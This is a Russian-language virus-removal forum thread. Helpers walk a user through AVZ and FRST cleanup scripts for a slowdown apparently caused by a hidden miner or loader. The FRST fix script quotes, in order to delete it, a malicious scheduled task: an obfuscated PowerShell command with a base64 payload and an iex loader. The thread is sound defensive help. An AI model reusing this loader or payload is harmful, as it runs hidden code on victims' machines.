Недавно началось, не заметил после каких действий. Иногда начинает сильно тормозить компьютер, даже открытые окна еле перемещаются. При открытии диспетчера задач все резко прекращается и возвращается в нормальное состояние.
Недавно началось, не заметил после каких действий. Иногда начинает сильно тормозить компьютер, даже открытые окна еле перемещаются. При открытии диспетчера задач все резко прекращается и возвращается в нормальное состояние.
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) Gwinbleid, спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект.
Здравствуйте!
Временно отключите защитное ПО.
Выполните скрипт в AVZ:
Компьютер перезагрузится.Код:begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); ClearQuarantineEx(true); QuarantineFile('C:\Mhs\Run_mhs.vbe', ''); QuarantineFile('C:\ProgramData\windows\dlchosts.exe', ''); QuarantineFile('C:\ProgramData\Windows\Profile\1.vbs', ''); QuarantineFile('C:\ProgramData\windows\profile\dllhostn.exe', ''); QuarantineFile('C:\ProgramData\windows\profile\service.exe', ''); QuarantineFileF('c:\programdata\windows', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0 , 0); DeleteSchedulerTask('Mhs'); DeleteSchedulerTask('Microsoft\Windows\DiskDiagnostic\DiskDiagnostic'); DeleteSchedulerTask('Microsoft\Windows\Maintenance\WinNAT'); DeleteFile('C:\Mhs\Run_mhs.vbe', '64'); DeleteFile('C:\ProgramData\windows\dlchosts.exe', ''); DeleteFile('C:\ProgramData\Windows\Profile\1.vbs', '64'); DeleteFile('C:\ProgramData\windows\profile\dllhostn.exe', ''); DeleteFile('C:\ProgramData\windows\profile\service.exe', ''); DeleteFileMask('c:\programdata\windows', '*', true); DeleteDirectory('c:\programdata\windows'); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; ExecuteWizard('SCU', 2, 3, true); RebootWindows(true); end.
Файл quarantine.zip из папки AVZ загрузите по ссылке "Прислать запрошенный карантин" вверху темы.
Сделайте повторные логи по правилам. (CollectionLog)
Прикрепил новые логи, отправил карантин. run_mhs.vbe вчера удалил, касперский на него ругался после проверки, да и толку мало от него было.
Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.
Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Прикреплены
Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.
- Отключите до перезагрузки антивирус.
- Выделите следующий код:
Код:Start:: SystemRestore: On CreateRestorePoint: HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ GroupPolicy: Ограничение ? <==== ВНИМАНИЕ Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ Task: {618FB81D-F067-47EE-AFB9-189B33800E5C} - System32\Tasks\Microsoft\Windows\Maintenance\WinNAT => 1.vbs Task: {7402779C-54C2-4376-8B16-04FE28B15219} - System32\Tasks\Microsoft\Windows\DiskDiagnostic\DiskDiagnostic => powershell.exe -c "$blZO='uHamOuAjvUmrXcVcty3AVNIs1H/1TcoYnASYSsdfmgnoZJUF3nvpKux3+H7vfa9i4QCjcbsn7zjCRoV2zTzcH5IZhByJX91ezUS8J4ldvmzrKNZl9nr4bKFB8APofestyH+NTKdykk7jH5AJwFLeRsZCyV6pMclW3jupN7supzvpJdpB8APofestyH+NTKdykkz0AZ0VmwS1StIzjwPmd5xI1Gj4LKIj7jHadO19/jHpbOlR436QEJV0hCO1FokcmxXTVJpeqBXicbgHlWfoOL1y/SS/aq9i+x/kYbsn9iHdEINnzTrjXq8VnCKNA5gfkxXiK9Bb1Gr4OL1172+1S/Vz/QXvW+ln4yHdEM1zlX2xWLMjkQOcFYVevgnpdZwShFSmP99183LZefJ3v0TPbPRq6H3RSp5yhzP+EoIViwTII5EDiQPqLbAv3lrod/xm8U3+eeV3+1i4avVzqF2cFqJyg27+HpsVuwSaFYkd1U+uKtcylWj4UfZC8nuzMag7qVi4ca0hsC2SVJpjiXazWdMZjlizGYYEoELkZ9lNnmy8Nqk1tWS/a7AvzhXoNdRi6H6WD9A6vXf/GYUFhVDZUMU9nB7ubowN0D2nIfNtoUTobPN75xfBQ+ti8nKkWMp2km25K4URnBi1StICkhPpZ9FTlT62XvRm6HfGIrth4B60Q+ti8nKkWMpS2ja1A9lZwVnBS4EW1UL0MtlNnGy8NrB8uHXxM7wwpxPzdaQ4+3+VEZVs1HT7W9VSxgSDUtMN2QfjPtsIhH3sP7YouHXxN+h8uF7scPY87yfdC9Is1GysK7sJmwSNHcY+mBKpVJwComztcPx06EKhIsJg7BHofa4n537QWdRl3l/9HIcHqQWcH7oVmQ/1ZpoUzS36ZPV0+SS/aq9H+hXuWeFm6G7ERoV2yzrjA5hNzALGN40ErwP0c5YOg2y0LKIj/3umPPNh+V7PbOd382m6DZRyy3f3WLMZhgS1VIsU3UvpZtlTwDu1fvx/9WvmPPMv7RX/OK5Y1WOKFpV63l3+Hp4VmgS1StI2jwnqQZgTlT+oVu119XH8MKl87Aexd+Rp43mNQqNug2r0HcY5p167BJoVnAvVZpgElXu0Iet07DHcffVA7APsd+hw40mNEJV2nTa4WcFeuhWJFLwfuAjjK9BJ2Sm0Ifhjtz3uIehn4x/3d6QqvWeQBNg33XD+BMhUmlmTFZAZiRujccQ7o3Dvcfxqskv+YPU8zB7/d+Jq6H2kWMpCpFipXq8VnCOcAoEemk6jcdBb1GihLb11oTvpNvJi5RnoMKQjpDbLS9lMwEOqVIdN2EuBFsBUnEaqZohAwSDnIfY6tHb+YKE2+yutRa8j+jq2F4Q6o2rjGYYXlRWEA40Zm06jYtlNlXi8MrB8uGemOqMpoT75b6tM5HCcAYQ3o2fiBI0dxiSAAo0RmQ/pZNcthX35fbEj6G3ufa02+yutRapY9H+fP9Rv2Te/M4QfmxXAWdMZm06je9Ab1GahJ6kl4Xr3a+RprR+hOrch+2ecDoNyi3vpGZwNzB/VVIdejhPlcI0SmWf7LakrvETIYfJm7B2yVed37kfDWL1+njakQNhAxFDMH8Y8mAjgd5FJ2TK4d+o6+Hr4OKlJ2gnvbONuqE6cGoQ5tXDyH4wZhhe1StIlqSC/Lb4FhEvlcfx0tDv0MagyoVT1M6Q17W/MG4Jclyb2UsFLzAKbTbMFjw/aOcMlg2r9dfxD/Wv6S/Vg4B77MN1A6XSPB4JjrSSrJIcyiQONRtwjiRTubZ5I1HvvLLA8uG2mQ9Jr+gT5dahN427XNZV1onvgBY0DnC3SSqsCmAfzZtFEkW23J792oT2wPPNhoEu4aqhC6naWFbFihHHDFYwZmhWLBNVUmwfrcJxb1HuyUOpi7l78fe9mtFTpeb0n9DSJEJ9viSO1ANNUml6vFZwimBX3bJcTlSG1edZy6DLVbe1+sg==';&('ivRzevRzx'-replace'vRz')('$d=([regex]::Matches(''=kSKnkCZkgyZupnU2lmc0N1JrcCdldkL4YEVVpjOddmbppnU2R2bjpnU25WRuQHe6JldlRlLtVGd6JldzlneSZ3UbdCK4pnU2VmeSZXaoACe6JldlpnU2l2OpIXZi1WduxWYpJXZT5iai9GJgsCInAyJgsCIsVGZv1kLqJ2bkgCIpkyTaxmYkgyZulmc0pnU2NFN6Jld2U2chpnU2JUbvpnU2JnR6oTX0JXZ252bD5SblR3c5N1WoAyY6JldlRGI9ACZksjclJWb15GbhlmeSZnclNFIswWZ6Jldk9WTgQ3YlpnU2xWZzBCfg03JwUkVJJFRMFkeSZ3QJNVWIBFXuwFXnAScl1CIElUZ6JldjlmdlRkLfRyegUmc6Jldlh2dgwHIlZXa6JldyR2a6JldzlGZfJzM6JldulmeSZ3dgkWb3dGI9AiaipnU29GJ9tjYjRCIuJneSZXd0Vmc9tyKqRyOzRCIy9Gei1CIdpGJbJGckAicvpnU2hnYtASXpRyWiNGJg0DIdlGJbJ2YkszckAicvpnU2hnYtASKyUTMgI3bi1CIzRCIk5meSZXYi1CIzIDKg0DIzRCI9BTPqRyepQnb192QuIGckASZn1CIqRCKml2epsyKpRCI7Qnb192QuI2YkACds1CIpRCI7ADI9ASakgicvpnU2Z2Ow0jaksTXwslYwRCI9AycksTKzNXYwRCKzVmeSZHd5JEd6JldldkL4YEVVpjOddmb6JldpR2bj5WRuQneSZHelRlLtVmeSZHdzl3UbBSPgImeSZHcksXKzNneSZXYwRSXn5WaypnU2R3cbBCLipnU2NGJd11WlRneSZXeitFKjVmeSZHZg42bpR3Y6JlduVnZ'',''.'',''RivRzghvRztTvRzoLvRzeft'')|FovRzrEavRzch {$vRz_vRz.valvRzue}) -jvRzo'+'in '''';$d=[TevRzxt.EncovRzding]::UTvRzF'+2*2*2+'.GevRztString([ConvRzvert]::Fro'+'mvRzB'+'ase'+8*8+'StrivRzng($vRzd));&(''ivRzevRzx'')($d -repvRzlace''vvRzRz'');'-replace'vRz')" <==== ВНИМАНИЕ CHR HomePage: Default -> hxxp://search.conduit.com/?ctid=CT3317209&octid=EB_ORIGINAL_CTID&SearchSource=55&CUI=&UM=2&UP=SP34D47906-8607-4650-ADC6-5FECF3F2191F&SSPV= Folder:C:\ProgramData\Windows 2021-07-16 21:45 - 2021-07-20 11:53 - 000000000 _RSHD C:\ProgramData\Windows ContextMenuHandlers1: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} => -> Нет файла ContextMenuHandlers2: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} => -> Нет файла AlternateDataStreams: C:\ProgramData\Temp:D31D1159 [149] FirewallRules: [{B075B8D4-31E3-48CB-8780-2C639D601F18}] => (Allow) LPort=5357 FirewallRules: [{03337AE5-806F-401C-8867-F166F46B0EAA}] => (Allow) LPort=80 FirewallRules: [{1260FD92-6997-4F90-B743-33021C4BC434}] => (Allow) C:\ProgramData\Windows\Profile\dllhostn.exe => Нет файла FirewallRules: [{5CD59311-2D08-42EB-AE56-9C21DE4ADE58}] => (Allow) C:\ProgramData\Windows\Profile\wasp.exe => Нет файла FirewallRules: [{1377F5E8-86A1-4BB1-BD23-3BD69749EE4C}] => (Allow) C:\ProgramData\Windows\Profile\waspwing.exe => Нет файла ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions EmptyTemp: Reboot: End::- Скопируйте выделенный текст (правой кнопкой - Копировать).
- Запустите FRST (FRST64) от имени администратора.
- Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.
Fixlog
Что сейчас с проблемой?
Пока не проявлялась. Понаблюдаю сегодня-завтра, напишу. Спасибо
Пока наблюдаете, проделайте следующее:
- Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
- Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
- Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
- Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
- Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
- Прикрепите этот файл к своему следующему сообщению.
Готово
------------------------------- [ Windows ] -------------------------------
Internet Explorer 11.1198.18362.0 Внимание! Скачать обновления
--------------------------- [ OtherUtilities ] ----------------------------
Git version 2.29.2.2 v.2.29.2.2 Внимание! Скачать обновления
Oracle VM VirtualBox 4.3.12_ZZZZ v.4.3.12 Внимание! Скачать обновления
Python 3.9.0 (64-bit) v.3.9.150.0 Внимание! Скачать обновления
Ghostscript GPL 8.64 (Msi Setup) v.8.64 Внимание! Скачать обновления
^Удалите старую версию, скачайте и установите новую.^
Intel® Driver & Support Assistant v.3.2.0.9 Внимание! Скачать обновления
------------------------------ [ ArchAndFM ] ------------------------------
WinRAR 5.90 (64-bit) v.5.90.0 Внимание! Скачать обновления
---------------------------- [ ProxyAndVPNs ] -----------------------------
OpenVPN 2.4.8-I602-Win10 v.2.4.8-I602-Win10 Внимание! Скачать обновления
-------------------------------- [ Media ] --------------------------------
VLC media player v.3.0.12 Внимание! Скачать обновления
--------------------------- [ AdobeProduction ] ---------------------------
Adobe Flash Player 27 PPAPI v.27.0.0.187 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее.
Перечисленное желательно по возможности обновить/исправить.
Спасибо, обновлю как время появится. Вроде больше так не тормозило.
Ваши права в разделе
Ответить с цитированием
